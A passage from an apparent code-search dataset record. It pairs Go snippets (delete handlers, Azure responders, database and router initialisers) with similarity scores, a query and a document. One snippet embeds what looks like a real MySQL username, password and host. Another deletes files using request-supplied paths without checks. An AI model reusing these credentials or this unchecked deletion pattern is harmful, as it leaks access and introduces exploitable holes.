%v\",\n\t\t\t\t\tc.name, next)\n\t\t\t}\n\t\t\tc.resetDeleteTimer(next)\n\t\t}\n\t}\n\tcs.Unlock()\n\tif delete {\n\t\tif testDeleteChannel {\n\t\t\ttime.Sleep(time.Second)\n\t\t}\n\t\tif s.isClustered {\n\t\t\ts.replicateDeleteChannel(c)\n\t\t} else {\n\t\t\ts.processDeleteChannel(c.name)\n\t\t}\n\t}\n}", "func DeleteMessage(c *gin.Context) {\n\tif messageId, err := strconv.Atoi(c.Param(\"messageid\")); err == nil {\n\t\tif err := store.DeleteMessage(messageId); err == nil {\n\t\t\trender(c, gin.H{\n\t\t\t\t\"title\": \"Successfully deleted message\"}, \"delete-successful.html\")\n\t\t} else {\n\t\t\tc.AbortWithError(http.StatusNoContent, fmt.Errorf(\"Not find corresponding message based in id %d\", messageId))\n\t\t}\n\t} else {\n\t\tc.AbortWithStatus(http.StatusInternalServerError)\n\t}\n}", "func (client BaseClient) DeleteFeatureInstanceResponder(resp *http.Response) (result FeatureInstance, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (srv *Server) handleDelete(res http.ResponseWriter, req *http.Request) {\n\tfor _, rute := range srv.routeDeletes {\n\t\tvals, ok := rute.parse(req.URL.Path)\n\t\tif ok {\n\t\t\trute.endpoint.call(res, req, srv.evals, vals)\n\t\t\treturn\n\t\t}\n\t}\n\tres.WriteHeader(http.StatusNotFound)\n}", "func (client ListManagementTermListsClient) DeleteResponder(resp *http.Response) (result String, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result.Value),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (s Service) DeleteMessage(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\n\tidS, ok := mux.Vars(r)[\"id\"] // Gets params\n\tif !ok {\n\t\thttp.NotFound(w, r)\n\t\treturn\n\t}\n\n\tid, err := strconv.Atoi(idS)\n\tif err != nil {\n\t\thttp.Error(w, err.Error(), http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tmes, err := s.strg.DeleteByID(uint(id))\n\tif err == errors.New(\"Deleted message\") {\n\t\thttp.Error(w, err.Error(), http.StatusGone)\n\t\treturn\n\t}\n\n\tif err != nil {\n\t\thttp.Error(w, err.Error(), http.StatusBadRequest)\n\t\treturn\n\t}\n\tjsonResponse, err := json.Marshal(mes)\n\tif err != nil {\n\t\thttp.Error(w, err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\tfmt.Fprint(w, string(jsonResponse))\n\t// params := mux.Vars(r)\n\t// for index, mas := range Messages {\n\t// \tif mas.ID == params[\"id\"] {\n\t// \t\tMessages = append(Messages[:index], Messages[index+1:]...)\n\t// \t\tbreak\n\t// \t}\n\t// }\n\t// json.NewEncoder(w).Encode(Messages)\n}", "func (client VersionsClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusNoContent),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func (client ReferenceDataSetsClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusNoContent),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func DeleteMessage(ctx *context.Context, session *context.Session, w http.ResponseWriter, r *http.Request, vars map[string]string) {\n\terr := ctx.MessageService.DeleteMessage(vars[\"id\"], session.CurrentUser)\n\n\tif err != nil {\n\t\thandleError(w, err)\n\t\treturn\n\t}\n}", "func DelayedMessageDelete(session *discordgo.Session, delay time.Duration, cID, mID string) {\n\ttime.Sleep(delay)\n\terr := session.ChannelMessageDelete(cID, mID)\n\tif err != nil {\n\t\tlog.WithError(err).Error(\"Failed deleing message\")\n\t}\n}", "func (client ModelClient) DeleteEntityResponder(resp *http.Response) (result OperationStatus, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func deleteHandler(w http.ResponseWriter, r *http.Request) {\n\tfmt.Println(\"Received a content request. Preparing response\")\n\tresp := response{\n\t\tSuccessful: false,\n\t\tErrMsg: errors.New(\"Unknown failure\"),\n\t}\n\twriter := json.NewEncoder(w)\n\tdefer writer.Encode(resp)\n\n\t// Parse the request.\n\tfmt.Println(\"Parsing request\")\n\tdata := form{}\n\tresp.ErrMsg = json.NewDecoder(r.Body).Decode(&data)\n\n\tfmt.Println(\"Obtained following data: \")\n\tfmt.Printf(\"%+v\\n\", data)\n\n\t// Validate requestor token\n\tvalid := true\n\tvalid, resp.ErrMsg = session.Validate(data.User, data.Token)\n\n\tfilepath = path + data.ID + data.ContentType\n\n\tmodErr = update.ModifyContentFilePath(\"\")\n\tdeleteErr = delete(filepath)\n\n\tif modErr != nil {\n\t\tresp.ErrMsg = modErr\n\t} else {\n\t\tresp.ErrMsg = deleteErr\n\t}\n\n}", "func (client ApplicationsClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusNoContent),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func (client ListManagementImageClient) DeleteImageResponder(resp *http.Response) (result String, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result.Value),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (client ModelClient) DeleteSubListResponder(resp *http.Response) (result OperationStatus, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (client CertificateClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted, http.StatusNoContent),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}" ]
[ "0.7750925", "0.6899156", "0.68633205", "0.6679848", "0.6557125", "0.65511835", "0.6498537", "0.63918865", "0.6388954", "0.6379347", "0.63770807", "0.6354654", "0.6294034", "0.62326926", "0.6200813", "0.6182433", "0.60744053", "0.60292774", "0.5997569", "0.5922095", "0.5871016", "0.58615226", "0.5842901", "0.5833292", "0.5820513", "0.58204347", "0.5815642", "0.5795602", "0.5788443", "0.57817775", "0.577598", "0.57605517", "0.5758787", "0.5744594", "0.5744594", "0.5743632", "0.57351947", "0.5732404", "0.5719675", "0.5709982", "0.5709636", "0.57063204", "0.57042664", "0.56951594", "0.5690281", "0.5677391", "0.5660791", "0.56491494", "0.5648552", "0.5646356", "0.5633689", "0.56325346", "0.5631446", "0.56214416", "0.5617177", "0.56157184", "0.561398", "0.5613888", "0.5609109", "0.5607614", "0.56068385", "0.5588251", "0.5586849", "0.5583235", "0.5578354", "0.55728185", "0.5571957", "0.55594033", "0.55589277", "0.5554228", "0.5544391", "0.55382335", "0.5513217", "0.55126494", "0.5505811", "0.5505107", "0.55015045", "0.5499423", "0.54965323", "0.54877687", "0.5484497", "0.5482687", "0.5473122", "0.54706717", "0.5467267", "0.54621094", "0.54602385", "0.54589957", "0.5450957", "0.54492664", "0.5447832", "0.54451585", "0.544133", "0.54364645", "0.54315585", "0.5430209", "0.5426583", "0.54258037", "0.5423913", "0.5421391" ]
0.7663503
1
Initialize will create database connection and wire up routes
func (app *App) Initialize(user, password, dbname string) { connectionString := fmt.Sprintf("user=%s password=%s dbname=%s", user, password, dbname) var err error app.DB, err = sql.Open("postgres", connectionString) if err != nil { log.Fatal(err) } app.Router = mux.NewRouter() }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (a *App) Initialize() {\n\tpsqlInfo := fmt.Sprintf(\"host=%s port=%d user=%s \"+\"password=%s dbname=%s sslmode=disable\",\n\thost, port, user, password, dbname)\n\tvar err error\n\ta.DB, err = sql.Open(\"postgres\", psqlInfo)\n\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\ta.Router = mux.NewRouter()\n\ta.initializeRoutes()\n}", "func (a *App) Initialize() {\n\tvar err error\n\ta.db, err = sql.Open(\"mysql\",\n\t\t\"dbu309mg6:1XFA40wc@tcp(mysql.cs.iastate.edu:3306)/db309mg6?charset=utf8mb4\")\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\terr = a.db.Ping()\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\ta.router = mux.NewRouter()\n\ta.initializeRoutes()\n}", "func (a *App) Initialize(user, dbname string) {\n\tconnectionString := fmt.Sprintf(\"user=%s dbname=%s sslmode=disable\", user, dbname)\n\t// connectionString := fmt.Sprintf(\"user=john dbname=subscription_test sslmode=disable\")\n\n\tvar err error\n\ta.DB, err = sql.Open(\"postgres\", connectionString)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\ta.Router = mux.NewRouter()\n\ta.initializeRoutes()\n}", "func (a *App) Initialize(ctx context.Context) {\n\n\t// Setup database\n\tclient, err := models.ConfigureDB(ctx)\n\n\tif err != nil {\n\t\tlog.Fatal(\"Couldn't connect to the database\", err)\n\t}\n\tmodels.TestDbConnection(client)\n\n\ta.DB = client.Database(models.DB_NAME)\n\n\t// Setup routes\n\ta.Router = server.ConfigureRoutes()\n\n}", "func (api *Api) Initialize(config *config.Configuration) {\n\tapi.DB = db.InitialConnection(config.DBName, config.MongoURL)\n\tapi.createIndexes()\n\n\tapi.Router = mux.NewRouter()\n\tapi.UseMiddleware(handler.JSONContentTypeMiddleware)\n\tapi.setRouters()\n}", "func (a *App) Initialize(databaseURL string) {\n\t// commenting out for Heroku Postgres service\n\t// connectionString :=\n\t// \tfmt.Sprintf(\"user=%s password=%s dbname=%s sslmode=disable\", user, password, dbname)\n\n\tvar err error\n\ta.DB, err = sql.Open(\"postgres\", databaseURL)\n\tif err != nil {\n\t\tlog.Fatalf(\"Could not connect to postgres: %+v\", err)\n\t}\n\n\ta.Router = mux.NewRouter()\n\ta.initializeRoutes()\n}", "func (a *App) Initialize(dbType, dbString string) {\n\tvar err error\n\ta.DB, err = gorm.Open(sqlite.Open(dbString))\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\ta.Engine = gin.Default()\n\ta.initializeRoutes()\n}", "func init() {\n\tconfig.Read()\n\n\tdao.Server = config.Server\n\tdao.Database = config.Database\n\tdao.Connect()\n}", "func init() {\n\tconfig.Read()\n\n\tdao.Server = config.Server\n\tdao.Database = config.Database\n\tdao.Connect()\n}", "func init() {\n\trouter = chi.NewRouter()\n\trouter.Use(middleware.Recoverer)\n\n\tdbSource := fmt.Sprintf(\"root:%s@tcp(%s:%s)/%s?charset=utf8\", dbPass, dbHost, dbPort, dbName)\n\n\tvar err error\n\tdb, err = sql.Open(\"mysql\", dbSource)\n\n\tcatch(err)\n}", "func init() {\n\t//func NewRouter() *Mux, its like if they did router=&newMux (if NewMux were a struct)\n\troute = chi.NewRouter() //NewRouter returns a new Mux object (*chi.Mux) that implements the Router interface,\n\t//so we assign it to router (which a pointer to a chi.Mux)\n\troute.Use(middleware.Recoverer) //Recoverer is a middleware that recovers from panics, logs the panic (and a\n\t// backtrace), and returns a HTTP 500 (Internal Server Error) status if\n\t// possible. Recoverer prints a request ID if one is provided.\n\tdbSource := fmt.Sprintf(\"host=%s port=%s dbname=%s user=%s password=%s sslmode=disable\", dbHost, dbPort, dbName, dbUser, dbPass)\n\t//%s for strings, %d for int\n\tvar err error //error var\n\thandlers.DB, err = sql.Open(\"postgres\", dbSource) //Create the sql db with the name: \"mysql\" and the source\n\thelper.Catch(err)\n\tlog.Println(\"Connected to the local DB!\")\n}", "func (a *App) Initialize(user, password, dbname string) {\n\ta.Router = mux.NewRouter()\n\n\ta.Router.HandleFunc(\"/shorten\", CreateShortCode).Methods(POST)\n\ta.Router.HandleFunc(\"/{shortcode}\", GetShortenCode).Methods(GET)\n}", "func (app *App) Initialize(config *config.Config) {\r\n\tapp.DB = mongodb.InitialConnection(\"id-card-ocr\", config.MongoURI())\r\n\r\n\tapp.Router = mux.NewRouter()\r\n\tapp.UseMiddleware(handler.JSONContentTypeMiddleware)\r\n\tapp.setRouters()\r\n}", "func init() {\n\tconfig.Read()\n\tdao.DialInfo = &mgo.DialInfo{\n\t\tAddrs: []string{config.Server},\n\t\tDatabase: config.Database,\n\t\tUsername: config.Username,\n\t\tPassword: config.Password,\n\t}\n\n\tdao.Server = config.Server\n\tdao.Database = config.Database\n\tdao.Connect()\n\n}", "func init() {\n\tconnectionString := os.Getenv(\"CLOUDSQL_CONNECTION\")\n\tdb, err := NewDb(\"mymysql\", connectionString)\n\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// running in google app engine complains that the db gets closed\n\t// by the time we get requests. removing that here but that can't be\n\t// right...\n\n\trouter := NewRouter(db)\n\n\thttp.Handle(\"/\", router)\n}", "func (a *App) Initialize(config *Configuration) {\n\tif !config.Debug {\n\t\tif config.Postgres == nil {\n\t\t\tlog.Panic(\"No postgres configuration is given, but debug mode is disabled\")\n\t\t}\n\t\tvar PgDbURL = config.Postgres.DbURL\n\t\tdbURLSliced := strings.Split(PgDbURL, \":\")\n\t\thost := dbURLSliced[0]\n\t\tport, err := strconv.Atoi(dbURLSliced[1])\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\t\tcreateErr := CreatePostgreDBIfNotExist(config.Postgres.Database, host, port, config.Postgres.Username, config.Postgres.Password)\n\t\tif createErr != nil {\n\t\t\tlog.Fatalf(\"Error during db creation: %v\", createErr)\n\t\t}\n\t\tconnectionString := fmt.Sprintf(\"host=%s port=%d user=%s password=%s dbname=%s sslmode=disable\",\n\t\t\thost, port, config.Postgres.Username, config.Postgres.Password, config.Postgres.Database)\n\t\ta.DB, err = sql.Open(\"postgres\", connectionString)\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\t\tCreateTable(a.DB)\n\t} else {\n\t\ta.DB = nil\n\t}\n\ta.DataGenerationWg.Add(1)\n\tgo generateRandomInitData(a.DB, config, &a.DataGenerationWg)\n\ta.Router = mux.NewRouter()\n\ta.InitializeRoutes()\n}", "func (a *App) Initialize() {\r\n\tlog.Println(\"API Init\")\r\n\tstartTime := time.Now()\r\n\ta.DB = make(map[string]db.DBHandler)\r\n\tdbHandler, err := db.OpenDB(\"postgres\", config.Env.DbConn)\r\n\tif err != nil {\r\n\t\tlog.Println(\"Could not connect database\")\r\n\t\tlog.Fatal(err.Error())\r\n\t}\r\n\ta.DB[\"db\"] = db.AutoMigrate(dbHandler)\r\n\ta.DB[\"db\"].LogMode(true)\r\n\r\n\tmockDbHandler, errMock := db.OpenDB(\"postgres\", config.Env.DbConnMock)\r\n\tif errMock != nil {\r\n\t\tlog.Println(\"Could not connect database\")\r\n\t\tlog.Fatal(errMock.Error())\r\n\t}\r\n\ta.DB[\"mock\"] = db.AutoMigrate(mockDbHandler)\r\n\r\n\ta.Artemis = &model.Artemis{\r\n\t\tSkip: config.Env.ArtemisSkip,\r\n\t}\r\n\ta.Artemis.Conn, err = stomp.Dial(\"tcp\", config.Env.ArtemisConn, config.Env.ArtemisOptions...)\r\n\tif err != nil {\r\n\t\tlog.Println(\"Could not connect artemis\")\r\n\t\tlog.Println(err.Error())\r\n\t}\r\n\r\n\t// set router\r\n\ta.Router = mux.NewRouter()\r\n\ta.setRouters()\r\n\r\n\tlog.Println(\"Init finished in \", time.Now().Sub(startTime))\r\n\tlog.Println(\"API Ready\")\r\n}", "func (app *App) Initialize(dbConfig DatabaseConfig, serverConfig ServerConfig) {\n\tvar err error\n\tapp.database, err = gorm.Open(\"mysql\", dbConfig.ToString())\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\t// Disable table name pluralization that uses gorm\n\tapp.database.SingularTable(true)\n\tif app.Debug {\n\t\tapp.database.LogMode(true)\n\t}\n\n\t// Create the package service\n\tds := service.PackageService{DB: app.database}\n\n\t// Create router and add logging middleware\n\tapp.router = mux.NewRouter()\n\tapp.router.Use(logger.Logger)\n\n\tv1group := app.router.PathPrefix(\"/v1\").Subrouter()\n\tv1group.HandleFunc(\"/packages\", ds.GetPackagesHandler).Methods(\"GET\")\n\tv1group.HandleFunc(\"/package\", ds.GetPackageHandler).Methods(\"GET\")\n\tv1group.HandleFunc(\"/package/latest\", ds.GetLatestPackageHandler).Methods(\"GET\")\n\n\t// Create server and set timeouts to avoid Slowloris attacks\n\tapp.server = &http.Server{\n\t\tAddr: serverConfig.ToString(),\n\t\tWriteTimeout: time.Second * 10,\n\t\tReadTimeout: time.Second * 10,\n\t\tIdleTimeout: time.Second * 60,\n\t\tHandler: app.router,\n\t}\n}", "func init() {\n\tRepoCreateDatabaseConnection(DatabaseConnection{Name: \"Write presentation\"})\n\tRepoCreateDatabaseConnection(DatabaseConnection{Name: \"Host meetup\"})\n}", "func (Server *Server) Initialize(Dbdriver, DbUser, DbPassword, DbPort, DbHost, DbName string) {\n\n\tvar err error\n\tDBURL := fmt.Sprintf(\"%s:%s@tcp(%s:%s)/%s?charset=utf8&parseTime=True&loc=Local\", DbUser, DbPassword, DbHost, DbPort, DbName)\n\tServer.DBServer, err = gorm.Open(Dbdriver, DBURL)\n\tif err != nil {\n\t\tfmt.Printf(\"Cannot connect to %s database\", Dbdriver)\n\t\tlog.Fatal(\"This is the error:\", err)\n\t} else {\n\t\tfmt.Printf(\"We are connected to the %s database\", Dbdriver)\n\t}\n\n\tServer.DBServer.Debug().AutoMigrate(&Data{})\n}", "func Initialize() {\n\tfmt.Println(\"inited DB\")\n\tvar err error\n\tclient, err = mongo.Connect(bg(), options.Client().ApplyURI(config.DatabaseURL))\n\tif err != nil {\n\t\tlog.Fatalf(\"%+v\\n\", err)\n\t}\n\n\tdb = client.Database(config.DatabaseName)\n}", "func (a *Context) Init(config *structs.Config) {\r\n\tvar err error\r\n\r\n\ta.DB, err = database.Init(config)\r\n\tif err != nil {\r\n\t\tlog.Fatal(err, \"couldn't connect to db\")\r\n\t}\r\n\r\n\ta.Router = routes.Init(a.DB, config)\r\n}", "func Initalize(r *httprouter.Router) {\n\tvar err error\n\n\tdbUsername := os.Getenv(\"DB_USERNAME\")\n\tdbPassword := os.Getenv(\"DB_PASSWORD\")\n\tdbDatabase := os.Getenv(\"DB_DATABASE\")\n\n\tmessageRaw, err := ioutil.ReadFile(\"./message.txt\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tmessage = strings.Split(string(messageRaw), \"\\n\")\n\n\tdb, err = sql.Open(\"mysql\", dbUsername+\":\"+dbPassword+\"@/\"+dbDatabase+\"?charset=utf8mb4&collation=utf8mb4_unicode_ci\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\terr = db.Ping()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tpassword = os.Getenv(\"PASSWORD\")\n\n\tfmt.Printf(\"PASSWORD: %s\\n\", password)\n\n\tr.POST(\"/login\", loginRoute)\n\tr.GET(\"/contestants\", contestantsRoute)\n\tr.POST(\"/vote\", voteRoute)\n\tr.GET(\"/photos/:name\", photosRoute)\n}", "func Initialize() {\r\n\tlog.Info(\"BB: Initializing database service\")\r\n\r\n\tctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)\r\n\tdefer cancel()\r\n\r\n\tc, err := mongo.Connect(ctx, options.Client().ApplyURI(os.Getenv(\"M_URL\")))\r\n\tif err != nil {\r\n\t\tpanic(err)\r\n\t}\r\n\r\n\tClient = c\r\n\r\n\tRestCollection = Client.Database(os.Getenv(\"M_DB\")).Collection(\"restaurants\")\r\n\tUserCollection = Client.Database(os.Getenv(\"M_DB\")).Collection(\"users\")\r\n\tCardCollection = Client.Database(os.Getenv(\"M_DB\")).Collection(\"cards\")\r\n\r\n\terr = Client.Ping(ctx, nil)\r\n\tif err != nil {\r\n\t\tlog.Error(err)\r\n\t}\r\n\r\n\tlog.Info(\"BB: Connected to the following databases:\")\r\n\tlog.Info(Client.ListDatabaseNames(ctx, bson.D{}))\r\n}", "func (a *prUserIdMapperApp) Initialize() {\n\n\t// Override defaults\n\ta.initializeEnvironment()\n\n\t// Build connection strings\n\tconnectionString := fmt.Sprintf(\"user=%s password=%s dbname=%s sslmode=%s host=%s port=%s\",\n\t\tdbconf.username,\n\t\tdbconf.password,\n\t\tdbconf.database,\n\t\tdbconf.sslMode,\n\t\tdbconf.ip,\n\t\tdbconf.port)\n\n\thttpconf.listenString = fmt.Sprintf(\"%s:%s\", httpconf.ip, httpconf.port)\n\n\tvar err error\n\ta.DB, err = sql.Open(dbconf.dbDriver, connectionString)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\ta.Router = mux.NewRouter()\n\ta.initializeRoutes()\n}", "func Init() {\n\n\t// Crear un nuevo router.-\n\trouter := mux.NewRouter()\n\n\t// Configurar los recursos.-\n\n\t//\tGET.-\n\trouter.HandleFunc(\"/mongoDB/HeaderInfo\", getHeaders).Methods(\"GET\")\n\trouter.HandleFunc(\"/mongoDB/Database/{databaseName}/Collection/{collectionName}/Locomotives\", getLocomotives).Methods(\"GET\")\n\trouter.HandleFunc(\"/mongoDB/Database/{databaseName}/Collection/{collectionName}/Locomotive/{model}\", getLocomotive).Methods(\"GET\")\n\n\t//\tPOST.-\n\trouter.HandleFunc(\"/mongoDB/Database/{databaseName}/Collection/{collectionName}/Locomotive\", postLocomotive).Methods(\"POST\")\n\n\t//\tPATCH.-\n\trouter.HandleFunc(\"/mongoDB/Database/{databaseName}/Collection/{collectionName}/Locomotive/{model}\", patchLocomotive).Methods(\"PATCH\")\n\n\t//\tDELETE.-\n\trouter.HandleFunc(\"/mongoDB/Database/{databaseName}/Collection/{collectionName}/Locomotive/{model}\", deleteLocomotive).Methods(\"DELETE\")\n\n\t//\tDejar el servicio escuchando.-\n\tlog.Fatal(http.ListenAndServe(port, router))\n}", "func Initialize() {\n\tdatabaseHost := os.Getenv(\"DB_HOST\")\n\tdatabasePort := os.Getenv(\"DB_PORT\")\n\tdatabaseUser := os.Getenv(\"DB_USER\")\n\tdatabasePass := os.Getenv(\"DB_PASS\")\n\tdatabaseName := os.Getenv(\"DB_NAME\")\n\n\tpostgresConnectionURL := fmt.Sprintf(\"postgres://%s:%s@%s:%s/%s?sslmode=disable\", databaseUser, databasePass, databaseHost, databasePort, databaseName)\n\n\tvar err error\n\tdb, err = sql.Open(\"postgres\", postgresConnectionURL)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\t//defer db.Close()\n\n\terr = db.Ping()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tmaxOpenConn, err := strconv.Atoi(os.Getenv(\"DB_MAX_OPEN_CONN\"))\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tmaxIdleConn, err := strconv.Atoi(os.Getenv(\"DB_MAX_IDLE_CONN\"))\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tdb.SetMaxOpenConns(maxOpenConn)\n\tdb.SetMaxIdleConns(maxIdleConn)\n\n\tfmt.Println(\"Database connected!\")\n\n}", "func InitializeDb() {\n\tdbPort, err := strconv.Atoi(os.Getenv(\"DB_PORT\"))\n\tif err != nil {\n\t\tlog.Fatal(\"Database port is not valid\")\n\t}\n\n\tdbConnString := fmt.Sprintf(\n\t\t\"host=%s port=%d user=%s password=%s dbname=%s sslmode=disable\",\n\t\tos.Getenv(\"DB_HOST\"),\n\t\tdbPort,\n\t\tos.Getenv(\"DB_USER\"),\n\t\tos.Getenv(\"DB_PASS\"),\n\t\tos.Getenv(\"DB_NAME\"),\n\t)\n\n\tDB, err = sql.Open(\"postgres\", dbConnString)\n\tif err != nil {\n\t\tlog.Fatal(\"Could not connect to db- \", err)\n\t}\n}", "func init() {\n\tlog.Info(\"Initializing database\")\n\tpsqlInfo := fmt.Sprintf(\"host=%s port=%s user=%s \"+\n\t\t\"password=%s dbname=%s sslmode=disable\",\n\t\tconfig.Config().GetString(\"database.host\"),\n\t\tconfig.Config().GetString(\"database.port\"),\n\t\tconfig.Config().GetString(\"database.user\"),\n\t\tconfig.Config().GetString(\"database.password\"),\n\t\tconfig.Config().GetString(\"database.name\"))\n\tdb, err := sql.Open(\"postgres\", psqlInfo)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\terr = db.Ping()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tlog.Info(\"Successfully connected to database!\")\n}", "func init() {\n\t_ = godotenv.Load()\n\n\thostname := os.Getenv(\"HOST\")\n\tdbname := os.Getenv(\"DBNAME\")\n\tusername := os.Getenv(\"DBUSER\")\n\tpassword := os.Getenv(\"PASSWORD\")\n\n\tdbString := \"host=\" + hostname + \" user=\" + username + \" dbname=\" + dbname + \" sslmode=disable password=\" + password\n\n\tvar err error\n\tdb, err = gorm.Open(\"postgres\", dbString)\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t\tpanic(\"Unable to connect to DB\")\n\t}\n\n\tdb.AutoMigrate(&QuestionModel{})\n\tdb.AutoMigrate(&AnswerModel{})\n\tdb.AutoMigrate(&UserModel{})\n\tdb.AutoMigrate(&Cohort{})\n}", "func init() {\r\n\tCandidates = ConnectDB(\"Candidates\")\r\n}", "func (db *Database) Init() {\n\tdata, dbErr := tiedot.OpenDB(db.Location)\n\tif dbErr != nil {\n\t\tlog.Error(dbConnectionError{\n\t\t\tmsg: \"Failed to connect to the tiedot database\",\n\t\t\terr: dbErr,\n\t\t})\n\t}\n\n\t// Set up the collections - throw away the error for now.\n\tfor _, c := range db.Collections {\n\t\tdata.Create(c.Name)\n\t\tdata.Use(c.Name).Index(c.Index)\n\t}\n\n\tdb.Data = data\n}", "func InitializeDatabase() {\n\tvar err error\n\tconnectionString := os.Getenv(\"POSTGRES_CONNECTION_STRING\")\n\n\tif connectionString == \"\" {\n\t\tconnectionString = \"user=crudwizard password=crudwizard dbname=crudwizard sslmode=disable\"\n\t}\n\n\tDatabase, err = gorm.Open(\"postgres\", connectionString)\n\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tvalidations.RegisterCallbacks(Database)\n\n\tDatabase.LogMode(true)\n\tDatabase.AutoMigrate(&models.User{})\n\tDatabase.AutoMigrate(&models.Project{})\n\tDatabase.AutoMigrate(&models.AuthToken{})\n}", "func (p *DatabaseHandler) init(s *Server) error {\n\tdb, err := sql.Open(\"sqlite3\", s.srcDir+\"/database.db\")\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t\treturn StringError{\"ERROR: Some of databases weren't opened!\"}\n\t}\n\tp.db = db\n\n\tp.createTable()\n\treturn nil\n}", "func (server *Server) Initialize(Dbdriver, DbUser, DbPassword, DbPort, DbHost, DbName string) *gorm.DB {\n\tvar err error\n\n\tif Dbdriver == \"postgres\" {\n\t\tDBURL := fmt.Sprintf(\"host=%s port=%s user=%s dbname=%s sslmode=disable password=%s\", DbHost, DbPort, DbUser, DbName, DbPassword)\n\t\tserver.DB, err = gorm.Open(Dbdriver, DBURL)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Cannot connect to %s database\", err)\n\n\t\t} else {\n\t\t\tlog.Printf(\"We are connected to the %s database\", Dbdriver)\n\t\t}\n\t}\n\n\treturn server.DB\n}", "func init() {\n\t// Open a connection to GORM\n\tdb, err := gorm.Open(\"sqlite3\", \"shop.db\")\n\tif err != nil {\n\t\tpanic(\"Failed to connect database\")\n\t}\n\n\tDB = db\n\n\tDB.AutoMigrate(models.Supply{})\n}", "func Initialize() {\n\tdb, err := gorm.Open(\"mysql\", os.Getenv(\"MYSQL_CACHE_ENDPOINT\"))\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tConnection = db\n\tautoMigrate()\n}", "func Init() {\n\tvar err error\n\tdsn := \"host=localhost user=postgres password=postgres dbname=goMux_db port=5430 sslmode=disable\"\n\tDB, err = gorm.Open(postgres.Open(dsn), &gorm.Config{})\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\tlog.Fatal(err)\n\t}\n\tlog.Println(\"Connect to the DB\")\n\t// DB.AutoMigrate(&models.User{})\n}", "func init() {\n\tctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)\n\tdefer cancel()\n\tclient, err := mongo.Connect(ctx, options.Client().ApplyURI(os.Getenv(\"BRAIN_DB\")))\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdb = client.Database(dbName)\n}", "func Initialize(host string, routers []*Router, domain string, service string, secretCookie string) Routers {\n\thandlers = routers\n\treturn &routing{\n\t\thost: host,\n\t\tdomain: domain,\n\t\tservice: service,\n\t\tsecretCookie: secretCookie,\n\t}\n}", "func init() 